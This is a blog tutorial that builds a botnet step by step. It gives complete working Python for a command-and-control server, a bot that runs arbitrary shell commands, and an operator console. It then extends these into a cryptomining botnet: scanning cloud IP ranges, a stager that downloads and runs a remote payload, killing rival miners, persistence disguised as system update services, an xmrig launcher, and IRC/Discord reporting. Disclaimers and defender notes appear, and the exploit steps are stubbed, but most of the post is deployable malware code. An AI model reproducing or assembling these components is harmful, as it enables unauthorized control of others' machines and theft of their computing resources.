How to Build a Botnet
This post is for educational purposes only. Everything here runs on your own machine. Do not deploy this against systems you don't own. Unauthorized access to computer systems is illegal in virtually every jurisdiction.
What is a Botnet?
A botnet is a network of compromised machines – called bots – all controlled by a single operator through a command and control (C2) server. The person running the operation is called the bot herder.
Botnets are used for things like distributed denial-of-service (DDoS) attacks, spam campaigns, credential stuffing, and cryptomining. Understanding how they're built is useful for defenders because you can't detect or disrupt something you don't understand.
Architecture
A centralized botnet has three components:
- Bot – malware running on a compromised machine. Connects out to the C2 server, waits for commands, executes them, and sends results back.
- C2 Server – the hub. Accepts incoming connections from bots and from the operator, maintains a registry of connected bots, and routes commands.
- Operator – the bot herder's interface. Connects to the C2 server to list bots, select a target, and issue commands.
graph TD
Op["Operator (Bot Herder)"] -->|manages via CLI| C2["C2 Server"]
B1["Bot 1"] -->|outbound TCP| C2
B2["Bot 2"] -->|outbound TCP| C2
B3["Bot 3"] -->|outbound TCP| C2
C2 -->|routes commands| B1
C2 -->|routes commands| B2
C2 -->|routes commands| B3
Why bots connect outward
The C2 server never initiates a connection to a bot. The bots always connect out to the C2. This is intentional – most firewalls block unsolicited inbound connections but allow outbound TCP freely. By having bots initiate the connection on a common port (443, 80, etc.), the traffic blends in with normal web traffic and passes through corporate and home firewalls without special rules.
This asymmetry is a core reason botnets are difficult to block purely at the network level.
C2 architecture types
The centralized model we're building is the simplest, but not the only one used in the wild:
| Type | How it works | Weakness |
|---|---|---|
| Centralized (TCP/HTTP) | Bots connect to a single server | Take down the server, botnet goes dark |
| IRC-based | Bots join an IRC channel and listen for commands | Easy to infiltrate, IRC servers often blocked |
| HTTP polling | Bots periodically GET a page for new commands | Looks like normal web traffic, hard to block |
| P2P | Bots form a mesh, no single C2 | No single point of failure, very resilient |
| DGA | Bots generate domain names algorithmically to find the active C2 | Hard to preemptively block all generated domains |
What we're building
This post covers C2 infrastructure – the server and clients – not bot propagation (getting malware onto machines in the first place). Propagation is a separate topic involving exploit delivery, phishing, or physical access. We're only building the communication layer.
The full demo runs entirely on 127.0.0.1. You'll need three terminal windows.
Prerequisites
- Python 3.6+
- No third-party packages – standard library only
The protocol
All three components communicate over TCP using a simple length-prefixed binary protocol. Every message is a 4-byte big-endian unsigned integer (the payload length) followed by the UTF-8 encoded payload. This is more robust than newline-delimited messages because command output can contain newlines.
We'll define two helper functions used by all three scripts:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import struct
def send_msg(sock, text):
data = text.encode()
sock.sendall(struct.pack(">I", len(data)) + data)
def recv_msg(sock):
header = _recvall(sock, 4)
if header is None:
return None
(length,) = struct.unpack(">I", header)
payload = _recvall(sock, length)
return payload.decode() if payload is not None else None
def _recvall(sock, n):
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
To keep things self-contained, these helpers are inlined into each script rather than imported from a shared module.
Part 1: Localhost Demo
C2 Server – cnc.py
The C2 server listens for incoming connections. Each connecting client identifies itself
immediately after connecting – either as a BOT or as an OPERATOR. The server maintains
a thread-safe registry of connected bots. When an operator issues a run command, the server
forwards it to the selected bot and returns the output.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
# cnc.py
import socket
import struct
import sys
import threading
HOST = "0.0.0.0"
PORT = 9999
bots = {} # {bot_id: {"conn": socket, "addr": (ip, port)}}
bot_lock = threading.Lock()
next_bot_id = 0
# ---------- protocol helpers ----------
def send_msg(sock, text):
data = text.encode()
sock.sendall(struct.pack(">I", len(data)) + data)
def recv_msg(sock):
header = _recvall(sock, 4)
if header is None:
return None
(length,) = struct.unpack(">I", header)
payload = _recvall(sock, length)
return payload.decode() if payload is not None else None
def _recvall(sock, n):
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
# ---------- bot handler ----------
def handle_bot(conn, addr, bot_id):
print(f"[+] Bot {bot_id} registered from {addr[0]}:{addr[1]}")
gone = threading.Event()
with bot_lock:
bots[bot_id] = {"conn": conn, "addr": addr, "gone": gone}
try:
# Bot sits idle -- the operator handler talks to it directly via
# send_msg/recv_msg. We must NOT read from the socket here because
# a concurrent recv would race with the operator handler and corrupt
# the length-prefixed framing. Instead we block on a threading.Event
# that the operator handler sets when it detects the bot has gone away.
gone.wait()
except Exception:
pass
finally:
with bot_lock:
bots.pop(bot_id, None)
conn.close()
print(f"[-] Bot {bot_id} disconnected")
# ---------- operator handler ----------
def handle_operator(conn, addr):
print(f"[+] Operator connected from {addr[0]}:{addr[1]}")
selected = None # currently selected bot_id
try:
send_msg(conn, "Connected to C2. Commands: list, use <id>, run <cmd>, quit")
while True:
raw = recv_msg(conn)
if raw is None:
break
cmd = raw.strip()
if cmd == "help":
send_msg(conn, "Commands: list, use <id>, run <cmd>, quit")
elif cmd == "list":
with bot_lock:
if not bots:
send_msg(conn, "(no bots connected)")
else:
lines = [
f" [{bid}] {info['addr'][0]}:{info['addr'][1]}"
for bid, info in bots.items()
]
send_msg(conn, "\n".join(lines))
elif cmd.startswith("use "):
parts = cmd.split(None, 1)
if len(parts) < 2 or not parts[1].isdigit():
send_msg(conn, "Usage: use <id>")
continue
bid = int(parts[1])
with bot_lock:
if bid in bots:
selected = bid
send_msg(conn, f"Selected bot {bid} ({bots[bid]['addr'][0]})")
else:
send_msg(conn, f"Bot {bid} not found.")
elif cmd.startswith("run "):
if selected is None:
send_msg(conn, "No bot selected. Use 'use <id>' first.")
continue
command = cmd.split(None, 1)[1]
with bot_lock:
bot = bots.get(selected)
if bot is None:
send_msg(conn, f"Bot {selected} is no longer connected.")
selected = None
continue
try:
send_msg(bot["conn"], command)
output = recv_msg(bot["conn"])
send_msg(conn, output if output else "(no output)")
except Exception as e:
send_msg(conn, f"Error communicating with bot: {e}")
with bot_lock:
gone_bot = bots.pop(selected, None)
if gone_bot:
gone_bot["gone"].set()
selected = None
elif cmd == "quit":
send_msg(conn, "Goodbye.")
break
else:
send_msg(conn, f"Unknown command: '{cmd}'. Type 'help'.")
except Exception as e:
print(f"[!] Operator error: {e}")
finally:
conn.close()
print(f"[-] Operator {addr[0]}:{addr[1]} disconnected")
# ---------- main ----------
def main():
global next_bot_id
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server.bind((HOST, PORT))
except OSError as e:
print(f"[!] Failed to bind to {HOST}:{PORT} -- {e}")
sys.exit(1)
server.listen(50)
print(f"[*] C2 listening on {HOST}:{PORT}")
while True:
conn, addr = server.accept()
role = recv_msg(conn)
if role is None:
conn.close()
continue
if role == "BOT":
with bot_lock:
next_bot_id += 1
bid = next_bot_id
t = threading.Thread(
target=handle_bot, args=(conn, addr, bid), daemon=True
)
t.start()
elif role == "OPERATOR":
t = threading.Thread(
target=handle_operator, args=(conn, addr), daemon=True
)
t.start()
else:
conn.close()
if __name__ == "__main__":
main()
Key points:
threading.Threadper connection so bots don't block each other.bot_lockprotects the sharedbotsdict from race conditions.- The operator handler accesses a bot's socket directly and relays the command. The C2 is the intermediary – the operator never holds a direct connection to any bot.
SO_REUSEADDRlets you restart the server quickly without waiting for the OS to release the port.
Bot – bot.py
The bot connects outward to the C2, registers itself, then sits in a loop waiting for
commands. Each command is executed via subprocess and the output (stdout + stderr combined)
is sent back.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# bot.py
import socket
import struct
import subprocess
import sys
import time
C2_HOST = "127.0.0.1"
C2_PORT = 9999
RECONNECT_DELAY = 5 # seconds to wait before reconnecting after a dropped connection
# ---------- protocol helpers ----------
def send_msg(sock, text):
data = text.encode()
sock.sendall(struct.pack(">I", len(data)) + data)
def recv_msg(sock):
header = _recvall(sock, 4)
if header is None:
return None
(length,) = struct.unpack(">I", header)
payload = _recvall(sock, length)
return payload.decode() if payload is not None else None
def _recvall(sock, n):
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
# ---------- command execution ----------
def execute(command):
try:
result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=30,
)
output = result.stdout + result.stderr
return output.strip() if output.strip() else "(no output)"
except subprocess.TimeoutExpired:
return "(command timed out after 30s)"
except Exception as e:
return f"(execution error: {e})"
# ---------- main loop ----------
def run():
while True:
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn.connect((C2_HOST, C2_PORT))
send_msg(conn, "BOT")
print(f"[*] Registered with C2 at {C2_HOST}:{C2_PORT}")
while True:
command = recv_msg(conn)
if command is None:
print("[!] C2 connection closed.")
break
print(f"[*] Executing: {command}")
output = execute(command)
send_msg(conn, output)
except Exception as e:
print(f"[!] {e}. Reconnecting in {RECONNECT_DELAY}s...")
finally:
conn.close()
time.sleep(RECONNECT_DELAY)
if __name__ == "__main__":
run()
Key points:
- The reconnect loop means the bot will keep trying to reach the C2 after a disconnect. This mirrors real-world bot behavior – bots are designed to be resilient to C2 downtime.
subprocess.runwithshell=Trueruns the command through the system shell, which is why arbitrary shell syntax (pipes, redirects, etc.) works.- stdout and stderr are combined so the operator sees both normal output and error messages.
- A 30-second timeout prevents a long-running command from hanging the bot indefinitely.
Operator CLI – operator.py
The operator connects to the C2, identifies as an operator, and gets an interactive prompt to manage bots.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# operator.py
import socket
import struct
import sys
C2_HOST = "127.0.0.1"
C2_PORT = 9999
# ---------- protocol helpers ----------
def send_msg(sock, text):
data = text.encode()
sock.sendall(struct.pack(">I", len(data)) + data)
def recv_msg(sock):
header = _recvall(sock, 4)
if header is None:
return None
(length,) = struct.unpack(">I", header)
payload = _recvall(sock, length)
return payload.decode() if payload is not None else None
def _recvall(sock, n):
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
# ---------- main ----------
def main():
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn.connect((C2_HOST, C2_PORT))
except ConnectionRefusedError:
print(f"[!] Could not connect to C2 at {C2_HOST}:{C2_PORT}. Is cnc.py running?")
sys.exit(1)
send_msg(conn, "OPERATOR")
# Print the welcome message
welcome = recv_msg(conn)
if welcome:
print(welcome)
while True:
try:
cmd = input("\nc2> ").strip()
except (KeyboardInterrupt, EOFError):
cmd = "quit"
if not cmd:
continue
send_msg(conn, cmd)
response = recv_msg(conn)
if response is not None:
print(response)
if cmd == "quit":
break
conn.close()
if __name__ == "__main__":
main()
Running the demo
You need three terminals open in the same directory.
Terminal 1 – start the C2 server:
1
python cnc.py
1
[*] C2 listening on 0.0.0.0:9999
Terminal 2 – start a bot:
1
python bot.py
1
[*] Registered with C2 at 127.0.0.1:9999
You'll also see the C2 terminal print:
1
[+] Bot 1 registered from 127.0.0.1:PORT
Terminal 3 – connect as the operator:
1
python operator.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Connected to C2. Commands: list, use <id>, run <cmd>, quit
c2> list
[1] 127.0.0.1:PORT
c2> use 1
Selected bot 1 (127.0.0.1)
c2> run whoami
your-username
c2> run uname -a
Linux hostname 5.15.0 ...
c2> run ls /tmp
file1
file2
c2> quit
Goodbye.
You can open more terminals and run additional instances of bot.py to simulate a multi-bot
network. Each gets its own ID and can be targeted independently.
What's happening under the hood
sequenceDiagram
participant Op as Operator
participant C2 as C2 Server
participant Bot as Bot
Bot->>C2: TCP connect (outbound from bot)
Bot->>C2: send_msg("BOT")
Note over C2: registers bot, assigns ID 1
Op->>C2: TCP connect
Op->>C2: send_msg("OPERATOR")
C2-->>Op: "Connected to C2..."
Op->>C2: send_msg("list")
C2-->>Op: "[1] 127.0.0.1:PORT"
Op->>C2: send_msg("use 1")
C2-->>Op: "Selected bot 1"
Op->>C2: send_msg("run whoami")
C2->>Bot: send_msg("whoami")
Bot-->>C2: send_msg("your-username")
C2-->>Op: "your-username"
Part 2: Extending to a Real Network
The C2 server and bot code work identically on a real network – the only change is the IP address the bot connects to.
Only do this on machines and networks you own or have explicit written authorization to test against. Running a bot on someone else's machine without consent is unauthorized access.
Pointing the bot at a real C2
On the machine you want to act as the C2, find its IP:
1
2
ip addr show # Linux
ipconfig # Windows
Then update C2_HOST in bot.py:
1
C2_HOST = "192.168.1.50" # your C2 machine's IP
Make sure port 9999 is reachable from the bot machine. If there's a firewall between them, you'll need to open the port or use a port that's already allowed outbound (like 443 if you move to TLS, or 80).
Scanning for reachable hosts
If you want to discover what hosts are up on your local network before deploying a bot
manually, here's a corrected port scanner. The original version in most examples has a
subtle bug – the finally block runs regardless of whether the port was open, so you
need to check inside the try:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# scan.py
import ipaddress
import socket
def scan(cidr, ports=None, timeout=0.5):
"""Scan a CIDR range for hosts with open TCP ports.
Only use this on networks you own or have explicit permission to scan.
Args:
cidr: network range, e.g. "192.168.1.0/24"
ports: list of port numbers to check, defaults to [22, 80, 443, 8080]
timeout: seconds to wait per connection attempt
Returns:
list of (ip_str, [open_ports]) tuples
"""
if ports is None:
ports = [22, 80, 443, 8080]
results = []
for ip in ipaddress.IPv4Network(cidr, strict=False):
ip_str = str(ip)
open_ports = []
for port in ports:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip_str, port))
open_ports.append(port)
except (socket.timeout, ConnectionRefusedError, OSError):
pass
if open_ports:
results.append((ip_str, open_ports))
return results
if __name__ == "__main__":
import sys
cidr = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.0/24"
print(f"Scanning {cidr}...")
for ip, ports in scan(cidr):
print(f" {ip}: {ports}")
Run it against your own subnet:
1
python scan.py 192.168.1.0/24
1
2
3
4
Scanning 192.168.1.0/24...
192.168.1.1: [80, 443]
192.168.1.50: [22]
192.168.1.101: [22, 8080]
The bug in the naive version is calling hosts.append(host) inside the per-port
loop. Every time a port succeeds the entire host entry (with all ports found so
far) gets appended again, so a host with two open ports ends up in the list twice
with an incomplete port list each time:
1
2
3
4
5
6
7
# broken -- hosts.append runs once per successful port, not once per host
try:
socket.connect(...)
host[-1].append(port)
hosts.append(host) # appends a partial/duplicate entry on every success
except:
pass
The fix is to move hosts.append(host) outside the per-port loop so it runs
once after all ports have been scanned, as shown above.
Persistence
In a real deployment, bots are made persistent so they survive reboots. The mechanism depends on the OS:
- Linux – cron job (
@reboot python /path/to/bot.py) or a systemd user service unit - macOS – a
launchdplist in~/Library/LaunchAgents/ - Windows – a registry
Runkey underHKCU\Software\Microsoft\Windows\CurrentVersion\Run
Persistence is worth understanding from a detection standpoint. These are exactly the locations defenders check when investigating a compromised machine.
Part 3: A Real-World Scenario – Crypto Miner Botnet
Parts 1 and 2 covered the mechanics of a C2 in isolation. This section puts those mechanics into a realistic context: the crypto miner botnet, which is one of the most common botnet types seen in the wild today. The goal here is to understand how these operations actually work, what they look like on the wire, and what defenders look for. None of the code in this section contains working exploit payloads – those steps are stubbed so the overall shape is clear without being a ready-to-run attack toolkit.
How it spreads
A crypto miner botnet grows by scanning the public internet for servers running vulnerable or misconfigured services, exploiting them to get a shell, and then installing itself. The scanning isn't random – bots target IP ranges published by cloud providers (AWS, DigitalOcean, Vultr, Hetzner all publish their CIDR ranges publicly) because cloud servers are always on, have good bandwidth, and are frequently spun up and forgotten with default configurations.
The most commonly targeted ports and services are:
| Port | Service | Why it's targeted |
|---|---|---|
| 22 | SSH | Outdated daemons, weak/default credentials, or misconfigured key auth |
| 2375 | Docker API (unauthenticated) | Exposes full container and host control with no auth by default |
| 6379 | Redis (no-auth) | Default Redis has no password; allows arbitrary command execution via config writes |
| 8888 | Jupyter Notebook | Frequently deployed without a password, gives a full code execution interface |
| 80/443 | HTTP/S | Web apps running outdated software with known RCE vulnerabilities |
Here's an extended version of the scanner from Part 2 that specifically targets those services:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# spread_scan.py
import ipaddress
import socket
import random
# Ports worth checking for common misconfigurations
TARGET_PORTS = [22, 80, 443, 2375, 6379, 8888]
def scan_subnet(cidr, ports=None, timeout=0.5):
"""Scan a CIDR range for hosts with open target ports.
Only use this on networks you own or have explicit permission to scan.
"""
if ports is None:
ports = TARGET_PORTS
results = []
hosts = list(ipaddress.IPv4Network(cidr, strict=False).hosts())
random.shuffle(hosts) # randomise order to avoid sequential scan signatures
for ip in hosts:
ip_str = str(ip)
open_ports = []
for port in ports:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip_str, port))
open_ports.append(port)
except (socket.timeout, ConnectionRefusedError, OSError):
pass
if open_ports:
results.append((ip_str, open_ports))
return results
def pick_random_cloud_subnet():
"""Return a random /24 from a handful of well-known cloud provider ranges.
These ranges are publicly documented by each provider.
Using them here purely as examples of how bots pick targets.
"""
cloud_cidrs = [
"3.0.0.0/8", # AWS ap-southeast-1 (example)
"104.16.0.0/12", # Cloudflare / common hosting
"167.99.0.0/16", # DigitalOcean
"95.179.0.0/16", # Vultr
]
base = ipaddress.IPv4Network(random.choice(cloud_cidrs), strict=False)
# pick a random /24 within the larger block
subnets = list(base.subnets(new_prefix=24))
return str(random.choice(subnets))
The shuffle matters – sequential scanning of a /24 is a trivial IDS signature. Randomising the order and spreading attempts over time makes it look more like background noise.
Initial access and privilege escalation
Once the scanner returns a hit, the bot tries to turn an open port into a shell. The general flow for each service type is the same:
- Fingerprint the service (banner grab or a known probe request)
- Try the most common misconfiguration for that service
- If a foothold is established as a low-privilege user, check for priv-esc paths
- Report back to C2 with access details
The code below stubs out each exploit path. The comments describe what a real implementation would do – the intent is to make the technique legible to a defender without providing a working payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# exploit.py
class ExploitError(Exception):
pass
def fingerprint(ip, port, timeout=3):
"""Grab the service banner from an open port."""
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.send(b"\r\n")
return s.recv(1024).decode(errors="replace").strip()
except Exception:
return ""
def exploit(ip, port):
"""Attempt to gain shell access via a known misconfiguration.
Returns a shell command runner callable on success, raises ExploitError otherwise.
This is intentionally stubbed -- the comments describe the real technique.
"""
banner = fingerprint(ip, port)
if port == 22:
# SSH -- try a short list of common default credentials via paramiko.
# Real variants also try CVE-based auth-bypass on older OpenSSH versions.
# If creds succeed: return a function that runs commands over the SSH channel.
raise NotImplementedError("SSH exploit stub -- paramiko credential spray")
elif port == 2375:
# Unauthenticated Docker API -- POST /containers/create with a bind-mount
# of the host filesystem, then exec into the container to read/write host files.
# Trivially achieves root-equivalent access on the host.
raise NotImplementedError("Docker API stub -- container escape via host bind-mount")
elif port == 6379:
# Redis with no auth -- use CONFIG SET dir/dbfilename to write an SSH authorized_keys
# file or a cron entry directly to disk, then trigger a BGSAVE.
# Gives arbitrary file write as the redis user, often root.
raise NotImplementedError("Redis stub -- config write to disk for persistence")
elif port == 8888:
# Jupyter without a password -- POST to /api/kernels to create a kernel,
# then send arbitrary Python code via the websocket execute channel.
# Immediate unauthenticated code execution as whatever user launched Jupyter.
raise NotImplementedError("Jupyter stub -- kernel execute via REST API")
elif port in (80, 443):
# HTTP -- check the banner/Server header for known vulnerable software versions,
# then apply a matching RCE payload (deserialization, SSTI, command injection, etc.).
raise NotImplementedError("HTTP stub -- version-matched RCE payload")
raise ExploitError(f"No exploit available for port {port}")
def try_privesc(run_cmd):
"""Given a low-priv shell runner, try common privilege escalation paths.
run_cmd is a callable that takes a shell command string and returns stdout.
Returns True if we achieved root, False otherwise.
"""
checks = [
# SUID binaries that can be abused to get a root shell (see gtfobins.github.io)
"find / -perm -4000 -type f 2>/dev/null",
# World-writable cron scripts run as root
"find /etc/cron* /var/spool/cron -writable 2>/dev/null",
# Sudo rules that allow running something as root without a password
"sudo -n -l 2>/dev/null",
]
for cmd in checks:
try:
output = run_cmd(cmd)
if output.strip():
# A real bot would parse the output and chain into a known
# gtfobins technique or overwrite the writable cron script.
return True
except Exception:
pass
return False
Staged payload delivery
Carrying the full miner binary inside the initial implant is wasteful and makes the implant easier to fingerprint. Real operations split this into two stages:
- Stage 1 (stager) – tiny script, sole job is to phone home to a staging server and pull down the real payload, then execute it.
- Stage 2 (payload) – the full
miner_bot.pyserved from a plain HTTP server.
This also means the operator can update the payload on the staging server and all future infections automatically get the new version.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# stager.py
import os
import stat
import subprocess
import tempfile
import urllib.request
STAGING_URL = "http://127.0.0.1:8000/miner_bot.py"
def fetch_and_exec(url):
tmp = tempfile.mktemp(suffix=".py")
urllib.request.urlretrieve(url, tmp)
os.chmod(tmp, stat.S_IRWXU)
subprocess.Popen(["python3", tmp])
if __name__ == "__main__":
fetch_and_exec(STAGING_URL)
The staging server for the local demo is just Python's built-in HTTP server:
1
2
# serve miner_bot.py from the current directory
python3 -m http.server 8000
In a real operation the staging server is a separate VPS, often fronted by a CDN or legitimate-looking domain so the HTTP request blends in with normal traffic.
Killing competing miners
Once the payload lands, the first thing it does before starting its own miner is kill any other mining processes. The goal is exclusivity – a host running three miners splits its compute three ways, raises CPU alerts faster, and is more likely to get cleaned up.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# miner_bot.py (excerpt)
import os
import signal
import psutil
KNOWN_MINER_NAMES = {
"xmrig", "xmrig-notls",
"minerd", "cpuminer",
"cgminer", "bfgminer",
"ethminer", "phoenix",
"nbminer", "teamredminer",
"t-rex", "gminer",
}
def kill_competing_miners(own_pid):
"""Terminate any running processes that look like competing miners."""
for proc in psutil.process_iter(["pid", "name", "cmdline"]):
try:
name = (proc.info["name"] or "").lower()
cmdline = " ".join(proc.info["cmdline"] or []).lower()
if proc.info["pid"] == own_pid:
continue
if name in KNOWN_MINER_NAMES or any(m in cmdline for m in KNOWN_MINER_NAMES):
os.kill(proc.info["pid"], signal.SIGKILL)
except (psutil.NoSuchProcess, psutil.AccessDenied, ProcessLookupError):
pass
From a defender's perspective: if you notice a known miner process disappearing from
ps output and a new unknown high-CPU process appearing shortly after, that's a
strong indicator of a more sophisticated infection taking over.
Persistence
The bot installs itself to survive reboots. A production variant tries all applicable methods and takes the first one that works:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
# miner_bot.py (excerpt)
import os
import platform
import subprocess
import sys
import textwrap
def install_persistence(script_path=None):
"""Write persistence entries for the current platform.
script_path defaults to the currently running script.
Defender note: these are the exact locations to audit on a suspected host.
"""
if script_path is None:
script_path = os.path.abspath(sys.argv[0])
system = platform.system()
if system == "Linux":
_persist_linux(script_path)
elif system == "Darwin":
_persist_macos(script_path)
elif system == "Windows":
_persist_windows(script_path)
def _persist_linux(script_path):
# Method 1: user crontab -- survives as long as the user account exists
cron_line = f"@reboot python3 {script_path}\n"
try:
existing = subprocess.check_output(["crontab", "-l"],
stderr=subprocess.DEVNULL).decode()
except subprocess.CalledProcessError:
existing = ""
if script_path not in existing:
new_cron = existing + cron_line
proc = subprocess.Popen(["crontab", "-"],
stdin=subprocess.PIPE)
proc.communicate(new_cron.encode())
# Method 2: systemd user service -- more reliable, survives session logout
unit_dir = os.path.expanduser("~/.config/systemd/user")
os.makedirs(unit_dir, exist_ok=True)
unit_path = os.path.join(unit_dir, "sysupdate.service")
unit_content = textwrap.dedent(f"""\
[Unit]
Description=System Update Service
[Service]
ExecStart=python3 {script_path}
Restart=always
RestartSec=30
[Install]
WantedBy=default.target
""")
with open(unit_path, "w") as f:
f.write(unit_content)
subprocess.run(["systemctl", "--user", "enable", "--now", "sysupdate"],
stderr=subprocess.DEVNULL)
def _persist_macos(script_path):
# launchd plist in ~/Library/LaunchAgents/ -- loaded on login
plist_dir = os.path.expanduser("~/Library/LaunchAgents")
os.makedirs(plist_dir, exist_ok=True)
plist_path = os.path.join(plist_dir, "com.apple.sysupdate.plist")
plist_content = textwrap.dedent(f"""\
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.sysupdate</string>
<key>ProgramArguments</key>
<array>
<string>python3</string>
<string>{script_path}</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
""")
with open(plist_path, "w") as f:
f.write(plist_content)
subprocess.run(["launchctl", "load", plist_path], stderr=subprocess.DEVNULL)
def _persist_windows(script_path):
# Registry Run key -- executed on every user login
import winreg
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Run",
0, winreg.KEY_SET_VALUE
)
winreg.SetValueEx(key, "SystemUpdate", 0, winreg.REG_SZ,
f"python3 {script_path}")
winreg.CloseKey(key)
Detection checklist for each method:
| Method | What to check |
|---|---|
| Linux crontab | crontab -l for the affected user |
| Linux systemd user unit | systemctl --user list-units --all |
| macOS launchd | launchctl list and ~/Library/LaunchAgents/ |
| Windows registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run in regedit |
Mining
Once persistence is set and competing miners are dead, the bot launches xmrig
pointing at a pool. The wallet address and pool are the only operator-specific
config – everything else is generic:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# miner_bot.py (excerpt)
import subprocess
WALLET = "YOUR_WALLET_ADDRESS"
POOL = "pool.minexmr.com:4444"
WORKER = "bot1"
def start_miner():
"""Launch xmrig in the background.
Assumes xmrig is on PATH. Real deployments fetch the binary from the
staging server alongside the bot script.
"""
return subprocess.Popen(
[
"xmrig",
"--url", POOL,
"--user", f"{WALLET}.{WORKER}",
"--pass", "x",
"--background",
"--no-color",
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
The WORKER field (the part after the . in the username) is how the operator
tracks which bot is contributing what hashrate on the pool dashboard. Each bot gets
a unique worker name – typically derived from the hostname or a random ID assigned
at infection time.
Reporting via IRC (and Discord)
The bot reports its status and hashrate back to the operator periodically. IRC is the traditional channel for this – it requires no infrastructure beyond a public IRC server, the protocol is simple enough to implement with a raw socket, and IRC traffic on port 6667 used to blend in with legitimate traffic.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# irc_report.py
import socket
import time
IRC_HOST = "irc.libera.chat"
IRC_PORT = 6667
IRC_NICK = "sysupd8"
IRC_CHANNEL = "#status"
def irc_connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IRC_HOST, IRC_PORT))
s.settimeout(10)
s.send(f"NICK {IRC_NICK}\r\n".encode())
s.send(f"USER {IRC_NICK} 0 * :bot\r\n".encode())
# wait for MOTD / 001 welcome
time.sleep(3)
s.send(f"JOIN {IRC_CHANNEL}\r\n".encode())
return s
def irc_report(message, conn=None):
"""Post a message to the operator channel.
Opens a fresh connection each time to keep the bot stateless.
A real implementation would hold the connection open and handle PINGs.
"""
close_after = conn is None
if conn is None:
conn = irc_connect()
conn.send(f"PRIVMSG {IRC_CHANNEL} :{message}\r\n".encode())
if close_after:
conn.close()
Discord webhooks have largely replaced IRC in newer operations – they're three lines, require no infrastructure, and the traffic looks identical to normal Discord HTTPS:
1
2
3
4
5
6
7
8
# discord_report.py (brief alternative)
import requests
WEBHOOK_URL = "https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN"
def discord_report(message):
requests.post(WEBHOOK_URL, json={"content": message})
